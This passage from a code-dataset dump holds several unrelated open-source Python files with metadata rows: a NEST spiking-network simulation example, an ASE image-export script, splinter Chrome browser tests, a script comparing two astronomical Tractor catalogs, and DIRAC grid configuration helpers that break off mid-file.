# specification is reduced to assigning the pre-defined excitatory synapse it
# suffices to insert a string.
conn_params_ex = {'rule': 'fixed_indegree', 'indegree': CE}
nest.Connect(nodes_ex, nodes_ex + nodes_in, conn_params_ex, "excitatory")
print("Inhibitory connections")
###############################################################################
# Connecting the inhibitory population to all neurons using the pre-defined
# inhibitory synapse. The connection parameter as well as the synapse
# paramtere are defined analogously to the connection from the excitatory
# population defined above.
conn_params_in = {'rule': 'fixed_indegree', 'indegree': CI}
nest.Connect(nodes_in, nodes_ex + nodes_in, conn_params_in, "inhibitory")
###############################################################################
# Storage of the time point after the buildup of the network in a variable.
endbuild = time.time()
###############################################################################
# Simulation of the network.
print("Simulating")
nest.Simulate(simtime)
###############################################################################
# Storage of the time point after the simulation of the network in a variable.
endsimulate = time.time()
###############################################################################
# Reading out the total number of spikes received from the spike detector
# connected to the excitatory population and the inhibitory population.
events_ex = nest.GetStatus(espikes, "n_events")[0]
events_in = nest.GetStatus(ispikes, "n_events")[0]
###############################################################################
# Calculation of the average firing rate of the excitatory and the inhibitory
# neurons by dividing the total number of recorded spikes by the number of
# neurons recorded from and the simulation time. The multiplication by 1000.0
# converts the unit 1/ms to 1/s=Hz.
rate_ex = events_ex / simtime * 1000.0 / N_rec
rate_in = events_in / simtime * 1000.0 / N_rec
###############################################################################
# Reading out the number of connections established using the excitatory and
# inhibitory synapse model. The numbers are summed up resulting in the total
# number of synapses.
num_synapses = (nest.GetDefaults("excitatory")["num_connections"] +
nest.GetDefaults("inhibitory")["num_connections"])
###############################################################################
# Establishing the time it took to build and simulate the network by taking
# the difference of the pre-defined time variables.
build_time = endbuild - startbuild
sim_time = endsimulate - endbuild
###############################################################################
# Printing the network properties, firing rates and building times.
print("Brunel network simulation (Python)")
print("Number of neurons : {0}".format(N_neurons))
print("Number of synapses: {0}".format(num_synapses))
print(" Exitatory : {0}".format(int(CE * N_neurons) + N_neurons))
print(" Inhibitory : {0}".format(int(CI * N_neurons)))
print("Excitatory rate : %.2f Hz" % rate_ex)
print("Inhibitory rate : %.2f Hz" % rate_in)
print("Building time : %.2f s" % build_time)
print("Simulation time : %.2f s" % sim_time)
###############################################################################
# Plot a raster of the excitatory neurons and a histogram.
nest.raster_plot.from_device(espikes, hist=True)
| terhorstd/nest-simulator | pynest/examples/brunel_alpha_nest.py | Python | gpl-2.0 | 14,139 | [
"NEURON"
] | 35cdb120e4f613c75c68d3b5da606441e6f62f1b3d5e564f0af3ca49661653e9 |
from ase import io
t = io.read('mytrajectory.traj')
for i, s in enumerate(t):
# rotate to the desired direction
s.rotate('z', 'x', rotate_cell=True)
# repeat with keeping old cell
cell = s.get_cell()
s = s.repeat((1, 3, 3))
s.set_cell(cell)
ofname = str(i) + '.png'
print('writing', ofname)
io.write(ofname, s,
show_unit_cell=True,
bbox=[-3, -5, 50, 22]) # set bbox by hand, try and error
| misdoro/python-ase | doc/development/writepngs.py | Python | gpl-2.0 | 456 | [
"ASE"
] | fbf7a6925ab123681242b2b20eea53c5e67fe4bc29dd27257679e6c4bc69dacd |
# -*- coding: utf-8 -*-
# Copyright 2013 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import os
import unittest
from splinter import Browser
from .fake_webapp import EXAMPLE_APP
from .base import WebDriverTests
from selenium.common.exceptions import WebDriverException
def chrome_installed():
try:
Browser("chrome")
except WebDriverException:
return False
return True
@unittest.skipIf(not chrome_installed(), 'chrome is not installed')
class ChromeBrowserTest(WebDriverTests, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.browser = Browser("chrome")
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
self.browser.visit(EXAMPLE_APP)
def test_attach_file(self):
"should provide a way to change file field value"
file_path = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
'mockfile.txt'
)
self.browser.attach_file('file', file_path)
self.browser.find_by_name('upload').click()
html = self.browser.html
assert b'text/plain' in html
assert open(file_path).read().encode('utf-8') in html
def test_should_support_with_statement(self):
with Browser('chrome') as internet:
pass
@unittest.skipIf(not chrome_installed(), 'chrome is not installed')
class ChromeBrowserFullscreenTest(WebDriverTests, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.browser = Browser("chrome", fullscreen=True)
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
self.browser.visit(EXAMPLE_APP)
def test_should_support_with_statement(self):
with Browser('chrome', fullscreen=True) as internet:
pass
| lrowe/splinter | tests/test_webdriver_chrome.py | Python | bsd-3-clause | 1,916 | [
"VisIt"
] | 8f02e8701b0b967c77fda81b589dc529357d87636d921a630ad24bcfc71f65f7 |
from __future__ import print_function
import matplotlib
matplotlib.use('Agg')
import pylab as plt
import numpy as np
from glob import glob
import os
import re
from astrometry.util.fits import fits_table, merge_tables
from astrometry.libkd.spherematch import match_radec
from astrometry.util.plotutils import PlotSequence
from tractor.brightness import NanoMaggies
import scipy.stats
'''
This is a little script for comparing two directories full of tractor
catalogs.
'''
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--name1', help='Name for first data set')
parser.add_argument('--name2', help='Name for second data set')
parser.add_argument('--plot-prefix', default='compare',
help='Prefix for plot filenames; default "%default"')
parser.add_argument('--match', default=1.0, type=float,
help='Astrometric cross-match distance in arcsec')
parser.add_argument('dir1', help='First directory to compare')
parser.add_argument('dir2', help='Second directory to compare')
opt = parser.parse_args()
ps = PlotSequence(opt.plot_prefix)
name1 = opt.name1
if name1 is None:
name1 = os.path.basename(opt.dir1)
if not len(name1):
name1 = os.path.basename(os.path.dirname(opt.dir1))
name2 = opt.name2
if name2 is None:
name2 = os.path.basename(opt.dir2)
if not len(name2):
name2 = os.path.basename(os.path.dirname(opt.dir2))
tt = 'Comparing %s to %s' % (name1, name2)
# regex for tractor-*.fits catalog filename
catre = re.compile('tractor-.*.fits')
cat1,cat2 = [],[]
for basedir,cat in [(opt.dir1, cat1), (opt.dir2, cat2)]:
for dirpath,dirnames,filenames in os.walk(basedir, followlinks=True):
for fn in filenames:
if not catre.match(fn):
print('Skipping', fn, 'due to filename')
continue
fn = os.path.join(dirpath, fn)
t = fits_table(fn)
print(len(t), 'from', fn)
cat.append(t)
cat1 = merge_tables(cat1, columns='fillzero')
cat2 = merge_tables(cat2, columns='fillzero')
print('Total of', len(cat1), 'from', name1)
print('Total of', len(cat2), 'from', name2)
cat1.cut(cat1.brick_primary)
cat2.cut(cat2.brick_primary)
print('Total of', len(cat1), 'BRICK_PRIMARY from', name1)
print('Total of', len(cat2), 'BRICK_PRIMARY from', name2)
# cat1.cut((cat1.decam_anymask[:,1] == 0) *
# (cat1.decam_anymask[:,2] == 0) *
# (cat1.decam_anymask[:,4] == 0))
# cat2.cut((cat2.decam_anymask[:,1] == 0) *
# (cat2.decam_anymask[:,2] == 0) *
# (cat2.decam_anymask[:,4] == 0))
# print('Total of', len(cat1), 'unmasked from', name1)
# print('Total of', len(cat2), 'unmasked from', name2)
I,J,d = match_radec(cat1.ra, cat1.dec, cat2.ra, cat2.dec, opt.match/3600.,
nearest=True)
print(len(I), 'matched')
plt.clf()
plt.hist(d * 3600., 100)
plt.xlabel('Match distance (arcsec)')
plt.title(tt)
ps.savefig()
matched1 = cat1[I]
matched2 = cat2[J]
matched1.type = np.array([t.strip() for t in matched1.type])
matched2.type = np.array([t.strip() for t in matched2.type])
# Confusion matrix for source types
types = ['PSF', 'SIMP', 'EXP', 'DEV', 'COMP']
confusion = np.zeros((len(types), len(types)))
labels = []
assert(len(set(np.unique(matched1.type)) - set(types)) == 0)
assert(len(set(np.unique(matched2.type)) - set(types)) == 0)
for i,t1 in enumerate(types):
I = np.flatnonzero(matched1.type == t1)
if len(I) == 0:
continue
for j,t2 in enumerate(types):
J = np.flatnonzero(matched2.type[I] == t2)
if len(J) == 0:
continue
confusion[i, j] = float(len(J)) / float(len(I))
labels.append((i, j, '%i/%i' % (len(J), len(I))))
plt.clf()
plt.imshow(confusion, interpolation='nearest', cmap=plt.cm.Blues, vmin=0, vmax=1)
for r,c,s in labels:
plt.text(c, r, s, color='k', ha='center', fontsize=8)
plt.xticks(range(len(types)), types)
plt.yticks(range(len(types)), types)
plt.ylabel(name1)
plt.xlabel(name2)
ps.savefig()
plt.clf()
I = np.flatnonzero((matched1.type == 'PSF') * (matched2.type == 'PSF'))
print(len(I), 'PSF to PSF')
plt.plot(matched1.dchisq[I,0] - matched1.dchisq[I,1],
matched2.dchisq[I,0] - matched2.dchisq[I,1], 'k.', label='PSF to PSF')
I = np.flatnonzero((matched1.type == 'PSF') * (matched2.type == 'SIMP'))
print(len(I), 'PSF to SIMP')
plt.plot(matched1.dchisq[I,0] - matched1.dchisq[I,1],
matched2.dchisq[I,0] - matched2.dchisq[I,1], 'r.', label='PSF to SIMP')
I = np.flatnonzero((matched1.type == 'SIMP') * (matched2.type == 'PSF'))
print(len(I), 'SIMP to PSF')
plt.plot(matched1.dchisq[I,0] - matched1.dchisq[I,1],
matched2.dchisq[I,0] - matched2.dchisq[I,1], 'g.', label='SIMP to PSF')
I = np.flatnonzero((matched1.type == 'SIMP') * (matched2.type == 'SIMP'))
print(len(I), 'SIMP to SIMP')
plt.plot(matched1.dchisq[I,0] - matched1.dchisq[I,1],
matched2.dchisq[I,0] - matched2.dchisq[I,1], 'b.', label='SIMP to SIMP')
plt.xlabel('%s dchisq: PSF - SIMP' % name1)
plt.ylabel('%s dchisq: PSF - SIMP' % name2)
plt.legend(loc='upper left')
#plt.xscale('symlog')
#plt.yscale('symlog')
plt.plot([-20,20],[-20,20], 'k-', alpha=0.5)
plt.axhline(0, color='k', alpha=0.5)
plt.axvline(0, color='k', alpha=0.5)
plt.axis([-20,20,-20,20])
ps.savefig()
plt.clf()
I = np.flatnonzero((matched1.type == 'EXP') * (matched2.type == 'EXP'))
plt.plot(matched1.shapeexp_r[I], matched2.shapeexp_r[I], 'r.', label='exp')
I = np.flatnonzero((matched1.type == 'DEV') * (matched2.type == 'DEV'))
plt.plot(matched1.shapedev_r[I], matched2.shapedev_r[I], 'b.', label='dev')
plt.xlabel('%s radius (arcsec)' % name1)
plt.ylabel('%s radius (arcsec)' % name2)
plt.axis([0,4,0,4])
plt.legend()
ps.savefig()
for iband,band,cc in [(1,'g','g'),(2,'r','r'),(4,'z','m')]:
K = np.flatnonzero((matched1.decam_flux_ivar[:,iband] > 0) *
(matched2.decam_flux_ivar[:,iband] > 0))
print('Median mw_trans', band, 'is',
np.median(matched1.decam_mw_transmission[:,iband]))
plt.clf()
plt.errorbar(matched1.decam_flux[K,iband],
matched2.decam_flux[K,iband],
fmt='.', color=cc,
xerr=1./np.sqrt(matched1.decam_flux_ivar[K,iband]),
yerr=1./np.sqrt(matched2.decam_flux_ivar[K,iband]),
alpha=0.1,
)
plt.xlabel('%s flux: %s' % (name1, band))
plt.ylabel('%s flux: %s' % (name2, band))
plt.plot([-1e6, 1e6], [-1e6,1e6], 'k-', alpha=1.)
plt.axis([-100, 1000, -100, 1000])
plt.title(tt)
ps.savefig()
for iband,band,cc in [(1,'g','g'),(2,'r','r'),(4,'z','m')]:
good = ((matched1.decam_flux_ivar[:,iband] > 0) *
(matched2.decam_flux_ivar[:,iband] > 0))
K = np.flatnonzero(good)
psf1 = (matched1.type == 'PSF ')
psf2 = (matched2.type == 'PSF ')
P = np.flatnonzero(good * psf1 * psf2)
mag1, magerr1 = NanoMaggies.fluxErrorsToMagErrors(
matched1.decam_flux[:,iband], matched1.decam_flux_ivar[:,iband])
iv1 = matched1.decam_flux_ivar[:, iband]
iv2 = matched2.decam_flux_ivar[:, iband]
std = np.sqrt(1./iv1 + 1./iv2)
plt.clf()
plt.plot(mag1[K],
(matched2.decam_flux[K,iband] - matched1.decam_flux[K,iband]) / std[K],
'.', alpha=0.1, color=cc)
plt.plot(mag1[P],
(matched2.decam_flux[P,iband] - matched1.decam_flux[P,iband]) / std[P],
'.', alpha=0.1, color='k')
plt.ylabel('(%s - %s) flux / flux errors (sigma): %s' % (name2, name1, band))
plt.xlabel('%s mag: %s' % (name1, band))
plt.axhline(0, color='k', alpha=0.5)
plt.axis([24, 16, -10, 10])
plt.title(tt)
ps.savefig()
plt.clf()
lp,lt = [],[]
for iband,band,cc in [(1,'g','g'),(2,'r','r'),(4,'z','m')]:
good = ((matched1.decam_flux_ivar[:,iband] > 0) *
(matched2.decam_flux_ivar[:,iband] > 0))
#good = True
psf1 = (matched1.type == 'PSF ')
psf2 = (matched2.type == 'PSF ')
mag1, magerr1 = NanoMaggies.fluxErrorsToMagErrors(
matched1.decam_flux[:,iband], matched1.decam_flux_ivar[:,iband])
iv1 = matched1.decam_flux_ivar[:, iband]
iv2 = matched2.decam_flux_ivar[:, iband]
std = np.sqrt(1./iv1 + 1./iv2)
#std = np.hypot(std, 0.01)
G = np.flatnonzero(good * psf1 * psf2 *
np.isfinite(mag1) *
(mag1 >= 20) * (mag1 < dict(g=24, r=23.5, z=22.5)[band]))
n,b,p = plt.hist((matched2.decam_flux[G,iband] -
matched1.decam_flux[G,iband]) / std[G],
range=(-4, 4), bins=50, histtype='step', color=cc,
normed=True)
sig = (matched2.decam_flux[G,iband] -
matched1.decam_flux[G,iband]) / std[G]
print('Raw mean and std of points:', np.mean(sig), np.std(sig))
med = np.median(sig)
rsigma = (np.percentile(sig, 84) - np.percentile(sig, 16)) / 2.
print('Median and percentile-based sigma:', med, rsigma)
lp.append(p[0])
lt.append('%s: %.2f +- %.2f' % (band, med, rsigma))
bins = []
gaussint = []
for blo,bhi in zip(b, b[1:]):
c = scipy.stats.norm.cdf(bhi) - scipy.stats.norm.cdf(blo)
c /= (bhi - blo)
#bins.extend([blo,bhi])
#gaussint.extend([c,c])
bins.append((blo+bhi)/2.)
gaussint.append(c)
plt.plot(bins, gaussint, 'k-', lw=2, alpha=0.5)
plt.title(tt)
plt.xlabel('Flux difference / error (sigma)')
plt.axvline(0, color='k', alpha=0.1)
plt.ylim(0, 0.45)
plt.legend(lp, lt, loc='upper right')
ps.savefig()
for iband,band,cc in [(1,'g','g'),(2,'r','r'),(4,'z','m')]:
plt.clf()
mag1, magerr1 = NanoMaggies.fluxErrorsToMagErrors(
matched1.decam_flux[:,iband], matched1.decam_flux_ivar[:,iband])
mag2, magerr2 = NanoMaggies.fluxErrorsToMagErrors(
matched2.decam_flux[:,iband], matched2.decam_flux_ivar[:,iband])
meanmag = NanoMaggies.nanomaggiesToMag((
matched1.decam_flux[:,iband] + matched2.decam_flux[:,iband]) / 2.)
psf1 = (matched1.type == 'PSF ')
psf2 = (matched2.type == 'PSF ')
good = ((matched1.decam_flux_ivar[:,iband] > 0) *
(matched2.decam_flux_ivar[:,iband] > 0) *
np.isfinite(mag1) * np.isfinite(mag2))
K = np.flatnonzero(good)
P = np.flatnonzero(good * psf1 * psf2)
plt.errorbar(mag1[K], mag2[K], fmt='.', color=cc,
xerr=magerr1[K], yerr=magerr2[K], alpha=0.1)
plt.plot(mag1[P], mag2[P], 'k.', alpha=0.5)
plt.xlabel('%s %s (mag)' % (name1, band))
plt.ylabel('%s %s (mag)' % (name2, band))
plt.plot([-1e6, 1e6], [-1e6,1e6], 'k-', alpha=1.)
plt.axis([24, 16, 24, 16])
plt.title(tt)
ps.savefig()
plt.clf()
plt.errorbar(mag1[K], mag2[K] - mag1[K], fmt='.', color=cc,
xerr=magerr1[K], yerr=magerr2[K], alpha=0.1)
plt.plot(mag1[P], mag2[P] - mag1[P], 'k.', alpha=0.5)
plt.xlabel('%s %s (mag)' % (name1, band))
plt.ylabel('%s %s - %s %s (mag)' % (name2, band, name1, band))
plt.axhline(0., color='k', alpha=1.)
plt.axis([24, 16, -1, 1])
plt.title(tt)
ps.savefig()
magbins = np.arange(16, 24.001, 0.5)
plt.clf()
plt.plot(mag1[K], (mag2[K]-mag1[K]) / np.hypot(magerr1[K], magerr2[K]),
'.', color=cc, alpha=0.1)
plt.plot(mag1[P], (mag2[P]-mag1[P]) / np.hypot(magerr1[P], magerr2[P]),
'k.', alpha=0.5)
plt.xlabel('%s %s (mag)' % (name1, band))
plt.ylabel('(%s %s - %s %s) / errors (sigma)' %
(name2, band, name1, band))
plt.axhline(0., color='k', alpha=1.)
plt.axis([24, 16, -10, 10])
plt.title(tt)
ps.savefig()
y = (mag2 - mag1) / np.hypot(magerr1, magerr2)
plt.clf()
plt.plot(meanmag[P], y[P], 'k.', alpha=0.1)
midmag = []
vals = np.zeros((len(magbins)-1, 5))
median_err1 = []
iqd_gauss = scipy.stats.norm.ppf(0.75) - scipy.stats.norm.ppf(0.25)
# FIXME -- should we do some stats after taking off the mean difference?
for bini,(mlo,mhi) in enumerate(zip(magbins, magbins[1:])):
I = P[(meanmag[P] >= mlo) * (meanmag[P] < mhi)]
midmag.append((mlo+mhi)/2.)
median_err1.append(np.median(magerr1[I]))
if len(I) == 0:
continue
# median and +- 1 sigma quantiles
ybin = y[I]
vals[bini,0] = np.percentile(ybin, 16)
vals[bini,1] = np.median(ybin)
vals[bini,2] = np.percentile(ybin, 84)
# +- 2 sigma quantiles
vals[bini,3] = np.percentile(ybin, 2.3)
vals[bini,4] = np.percentile(ybin, 97.7)
iqd = np.percentile(ybin, 75) - np.percentile(ybin, 25)
print('Mag bin', midmag[-1], ': IQD is factor', iqd / iqd_gauss,
'vs expected for Gaussian;', len(ybin), 'points')
# if iqd > iqd_gauss:
# # What error adding in quadrature would you need to make the IQD match?
# err = median_err1[-1]
# target_err = err * (iqd / iqd_gauss)
# sys_err = np.sqrt(target_err**2 - err**2)
# print('--> add systematic error', sys_err)
# ~ Johan's cuts
mlo = 21.
mhi = dict(g=24., r=23.5, z=22.5)[band]
I = P[(meanmag[P] >= mlo) * (meanmag[P] < mhi)]
ybin = y[I]
iqd = np.percentile(ybin, 75) - np.percentile(ybin, 25)
print('Mag bin', mlo, mhi, 'band', band, ': IQD is factor',
iqd / iqd_gauss, 'vs expected for Gaussian;', len(ybin), 'points')
if iqd > iqd_gauss:
# What error adding in quadrature would you need to make
# the IQD match?
err = np.median(np.hypot(magerr1[I], magerr2[I]))
print('Median error (hypot):', err)
target_err = err * (iqd / iqd_gauss)
print('Target:', target_err)
sys_err = np.sqrt((target_err**2 - err**2) / 2.)
print('--> add systematic error', sys_err)
# check...
err_sys = np.hypot(np.hypot(magerr1, sys_err),
np.hypot(magerr2, sys_err))
ysys = (mag2 - mag1) / err_sys
ysys = ysys[I]
print('Resulting median error:', np.median(err_sys[I]))
iqd_sys = np.percentile(ysys, 75) - np.percentile(ysys, 25)
print('--> IQD', iqd_sys / iqd_gauss, 'vs Gaussian')
# Hmmm, this doesn't work... totally overshoots.
plt.errorbar(midmag, vals[:,1], fmt='o', color='b',
yerr=(vals[:,1]-vals[:,0], vals[:,2]-vals[:,1]),
capthick=3, zorder=20)
plt.errorbar(midmag, vals[:,1], fmt='o', color='b',
yerr=(vals[:,1]-vals[:,3], vals[:,4]-vals[:,1]),
capthick=2, zorder=20)
plt.axhline( 1., color='b', alpha=0.2)
plt.axhline(-1., color='b', alpha=0.2)
plt.axhline( 2., color='b', alpha=0.2)
plt.axhline(-2., color='b', alpha=0.2)
for mag,err,y in zip(midmag, median_err1, vals[:,3]):
if not np.isfinite(err):
continue
if y < -6:
continue
plt.text(mag, y-0.1, '%.3f' % err, va='top', ha='center', color='k',
fontsize=10)
plt.xlabel('(%s + %s)/2 %s (mag), PSFs' % (name1, name2, band))
plt.ylabel('(%s %s - %s %s) / errors (sigma)' %
(name2, band, name1, band))
plt.axhline(0., color='k', alpha=1.)
plt.axvline(21, color='k', alpha=0.3)
plt.axvline(dict(g=24, r=23.5, z=22.5)[band], color='k', alpha=0.3)
plt.axis([24.1, 16, -6, 6])
plt.title(tt)
ps.savefig()
#magbins = np.append([16, 18], np.arange(20, 24.001, 0.5))
if band == 'g':
magbins = [20, 24]
elif band == 'r':
magbins = [20, 23.5]
elif band == 'z':
magbins = [20, 22.5]
slo,shi = -5,5
plt.clf()
ha = dict(bins=25, range=(slo,shi), histtype='step', normed=True)
y = (mag2 - mag1) / np.hypot(magerr1, magerr2)
midmag = []
nn = []
rgbs = []
lt,lp = [],[]
for bini,(mlo,mhi) in enumerate(zip(magbins, magbins[1:])):
I = P[(mag1[P] >= mlo) * (mag1[P] < mhi)]
if len(I) == 0:
continue
ybin = y[I]
rgb = [0.,0.,0.]
rgb[0] = float(bini) / (len(magbins)-1)
rgb[2] = 1. - rgb[0]
n,b,p = plt.hist(ybin, color=rgb, **ha)
lt.append('mag %g to %g' % (mlo,mhi))
lp.append(p[0])
midmag.append((mlo+mhi)/2.)
nn.append(n)
rgbs.append(rgb)
bins = []
gaussint = []
for blo,bhi in zip(b, b[1:]):
#midbin.append((blo+bhi)/2.)
#gaussint.append(scipy.stats.norm.cdf(bhi) -
# scipy.stats.norm.cdf(blo))
c = scipy.stats.norm.cdf(bhi) - scipy.stats.norm.cdf(blo)
c /= (bhi - blo)
bins.extend([blo,bhi])
gaussint.extend([c,c])
plt.plot(bins, gaussint, 'k-', lw=2, alpha=0.5)
plt.legend(lp, lt)
plt.title(tt)
plt.xlim(slo,shi)
ps.savefig()
bincenters = b[:-1] + (b[1]-b[0])/2.
plt.clf()
lp = []
for n,rgb,mlo,mhi in zip(nn, rgbs, magbins, magbins[1:]):
p = plt.plot(bincenters, n, '-', color=rgb)
lp.append(p[0])
plt.plot(bincenters, gaussint[::2], 'k-', alpha=0.5, lw=2)
plt.legend(lp, lt)
plt.title(tt)
plt.xlim(slo,shi)
ps.savefig()
if __name__ == '__main__':
main()
| legacysurvey/pipeline | py/legacyanalysis/compare-two-catalogs.py | Python | gpl-2.0 | 18,973 | [
"Gaussian"
] | 428cf1e2b40e6f3c4176ca352293c7761ab09231e4ece67817d075d21d66233f |
# $HeadURL$
__RCSID__ = "$Id$"
import re
from distutils.version import LooseVersion
from DIRAC import S_OK, S_ERROR, gConfig
from DIRAC.ConfigurationSystem.Client.Helpers.Path import cfgPath
from DIRAC.Core.Utilities.List import uniqueElements
gBaseResourcesSection = "/Resources"
def getSites():
""" Get the list of all the sites defined in the CS
"""
result = gConfig.getSections( cfgPath( gBaseResourcesSection, 'Sites' ) )
if not result['OK']:
return result
grids = result['Value']
sites = []
for grid in grids:
result = gConfig.getSections( cfgPath( gBaseResourcesSection, 'Sites', grid ) )
if not result['OK']:
return result
sites += result['Value']
return S_OK( sites )
def getStorageElementSiteMapping( siteList = [] ):
""" Get Storage Element belonging to the given sites
"""
if not siteList:
result = getSites()
if not result['OK']:
return result
siteList = result['Value']
siteDict = {}
for site in siteList:
grid = site.split( '.' )[0]
ses = gConfig.getValue( cfgPath( gBaseResourcesSection, 'Sites', grid, site, 'SE' ), [] )
if ses:
siteDict[site] = ses
return S_OK( siteDict )
def getFTS2ServersForSites( self, siteList = None ):
""" get FTSServers for sites
:param list siteList: list of sites
"""
siteList = siteList if siteList else None
if not siteList:
siteList = getSites()
if not siteList["OK"]:
return siteList
siteList = siteList["Value"]
ftsServers = dict()
defaultServ = gConfig.getValue( cfgPath( gBaseResourcesSection, 'FTSEndpoints/Default', 'FTSEndpoint' ), '' )
for site in siteList:
serv = gConfig.getValue( cfgPath( gBaseResourcesSection, "FTSEndpoints/FTS2", site ), defaultServ )
if serv:
ftsServers[site] = serv
return S_OK( ftsServers )
def getFTS3Servers():
""" get FTSServers for sites
:param list siteList: list of sites
"""
csPath = cfgPath( gBaseResourcesSection, "FTSEndpoints/FTS3" )
# We do it in two times to keep the order
ftsServerNames = gConfig.getOptions( csPath ).get( 'Value', [] )
ftsServers = []
for name in ftsServerNames:
ftsServers.append( gConfig.getValue( cfgPath( csPath, name ) ) )
return S_OK( ftsServers )
def getSiteTier( site ):
"""
Return Tier level of the given Site
"""
result = getSitePath( site )
if not result['OK']:
return result
sitePath = result['Value']
return S_OK( gConfig.getValue( cfgPath( sitePath, 'MoUTierLevel' ), 2 ) )
def getSitePath( site ):
"""
Return path to the Site section on CS
"""
result = getSiteGrid( site )
if not result['OK']:
return result
grid = result['Value']
return S_OK( cfgPath( gBaseResourcesSection, 'Sites', grid, site ) )
def getSiteGrid( site ):
"""
Return Grid component from Site Name
"""
sitetuple = site.split( "." )
if len( sitetuple ) != 3:
return S_ERROR( 'Wrong Site Name format' )
return S_OK( sitetuple[0] )
def getStorageElementOptions( seName ):
""" Get the CS StorageElementOptions
"""
storageConfigPath = '/Resources/StorageElements/%s' % seName
result = gConfig.getOptionsDict( storageConfigPath )
if not result['OK']:
return result
options = result['Value']
# Help distinguishing storage type
diskSE = True
tapeSE = False
if options.has_key( 'SEType' ):
# Type should follow the convention TXDY
seType = options['SEType']
diskSE = re.search( 'D[1-9]', seType ) != None
tapeSE = re.search( 'T[1-9]', seType ) != None
options['DiskSE'] = diskSE
options['TapeSE'] = tapeSE
return S_OK( options )
def getQueue( site, ce, queue ):
""" Get parameters of the specified queue
"""
grid = site.split( '.' )[0]
result = gConfig.getOptionsDict( '/Resources/Sites/%s/%s/CEs/%s' % ( grid, site, ce ) )
if not result['OK']:
return result
resultDict = result['Value']
result = gConfig.getOptionsDict( '/Resources/Sites/%s/%s/CEs/%s/Queues/%s' % ( grid, site, ce, queue ) )
if not result['OK']:
return result
resultDict.update( result['Value'] )
resultDict['Queue'] = queue
return S_OK( resultDict )
def getQueues( siteList = None, ceList = None, ceTypeList = None, community = None, mode = None ):
""" Get CE/queue options according to the specified selection
"""
result = gConfig.getSections( '/Resources/Sites' )
if not result['OK']:
return result
resultDict = {}
grids = result['Value']
for grid in grids:
result = gConfig.getSections( '/Resources/Sites/%s' % grid )
if not result['OK']:
continue
sites = result['Value']
for site in sites:
if siteList is not None and not site in siteList:
continue
if community:
comList = gConfig.getValue( '/Resources/Sites/%s/%s/VO' % ( grid, site ), [] )
if comList and not community in comList:
continue
result = gConfig.getSections( '/Resources/Sites/%s/%s/CEs' % ( grid, site ) )
if not result['OK']:
continue
ces = result['Value']
for ce in ces:
if mode:
ceMode = gConfig.getValue( '/Resources/Sites/%s/%s/CEs/%s/SubmissionMode' % ( grid, site, ce ), 'InDirect' )
if not ceMode or ceMode != mode:
continue
if ceTypeList:
ceType = gConfig.getValue( '/Resources/Sites/%s/%s/CEs/%s/CEType' % ( grid, site, ce ), '' )
if not ceType or not ceType in ceTypeList:
continue
if community:
comList = gConfig.getValue( '/Resources/Sites/%s/%s/CEs/%s/VO' % ( grid, site, ce ), [] )
if comList and not community in comList:
continue
result = gConfig.getOptionsDict( '/Resources/Sites/%s/%s/CEs/%s' % ( grid, site, ce ) )
if not result['OK']:
continue
ceOptionsDict = result['Value']
result = gConfig.getSections( '/Resources/Sites/%s/%s/CEs/%s/Queues' % ( grid, site, ce ) )
if not result['OK']:
continue
queues = result['Value']
for queue in queues:
if community:
comList = gConfig.getValue( '/Resources/Sites/%s/%s/CEs/%s/Queues/%s/VO' % ( grid, site, ce, queue ), [] )
if comList and not community in comList:
continue
resultDict.setdefault( site, {} )
resultDict[site].setdefault( ce, ceOptionsDict )
resultDict[site][ce].setdefault( 'Queues', {} )
result = gConfig.getOptionsDict( '/Resources/Sites/%s/%s/CEs/%s/Queues/%s' % ( grid, site, ce, queue ) )
if not result['OK']:
continue
queueOptionsDict = result['Value']
resultDict[site][ce]['Queues'][queue] = queueOptionsDict
return S_OK( resultDict )
def getCompatiblePlatforms( originalPlatforms ):
""" Get a list of platforms compatible with the given list
"""
if type( originalPlatforms ) == type( ' ' ):
platforms = [originalPlatforms]
else:
platforms = list( originalPlatforms )
platforms = list( platform.replace( ' ', '' ) for platform in platforms )
result = gConfig.getOptionsDict( '/Resources/Computing/OSCompatibility' )
if not ( result['OK'] and result['Value'] ):
return S_ERROR( "OS compatibility info not found" )
platformsDict = dict( [( k, v.replace( ' ', '' ).split( ',' ) ) for k, v in result['Value'].iteritems()] )
for k, v in platformsDict.iteritems():
if k not in v:
v.append( k )
resultList = list( platforms )
for p in platforms:
tmpList = platformsDict.get( p, [] )
for pp in platformsDict:
if p in platformsDict[pp]:
tmpList.append( pp )
tmpList += platformsDict[pp]
if tmpList:
resultList += tmpList
return S_OK( uniqueElements( resultList ) )
def getDIRACPlatform( OS ):
""" Get standard DIRAC platform(s) compatible with the argument.
NB: The returned value is a list! ordered, in reverse, using distutils.version.LooseVersion
In practice the "highest" version (which should be the most "desirable" one is returned first)
"""
result = gConfig.getOptionsDict( '/Resources/Computing/OSCompatibility' )
if not ( result['OK'] and result['Value'] ):
return S_ERROR( "OS compatibility info not found" )
platformsDict = dict( [( k, v.replace( ' ', '' ).split( ',' ) ) for k, v in result['Value'].iteritems()] )
for k, v in platformsDict.iteritems():
if k not in v:
v.append( k )
# making an OS -> platforms dict
os2PlatformDict = dict()
for platform, osItems in platformsDict.iteritems():
for osItem in osItems:
if os2PlatformDict.get( osItem ):
os2PlatformDict[osItem].append( platform )
else:
os2PlatformDict[osItem] = [platform]
if OS not in os2PlatformDict:
return S_ERROR( 'No compatible DIRAC platform found for %s' % OS )
platforms = os2PlatformDict[OS]
platforms.sort( key = LooseVersion, reverse = True )
return S_OK( platforms )
def getDIRACPlatforms():
""" just returns list of platforms defined in the CS
"""
result = gConfig.getOptionsDict( '/Resources/Computing/OSCompatibility' )
if not ( result['OK'] and result['Value'] ):
return S_ERROR( "OS compatibility info not found" )
return S_OK( result['Value'].keys() )
def getCatalogPath( catalogName ):
""" Return the configuration path of the description for a a given catalog
"""
return '/Resources/FileCatalogs/%s' % catalogName
def getRegistrationProtocols():
""" Returns the Favorite registration protocol defined in the CS, or 'srm' as default """
return gConfig.getValue( '/Resources/FileCatalogs/RegistrationProtocols', ['srm', 'dips'] )
def getThirdPartyProtocols():
""" Returns the Favorite third party protocol defined in the CS, or 'srm' as default """
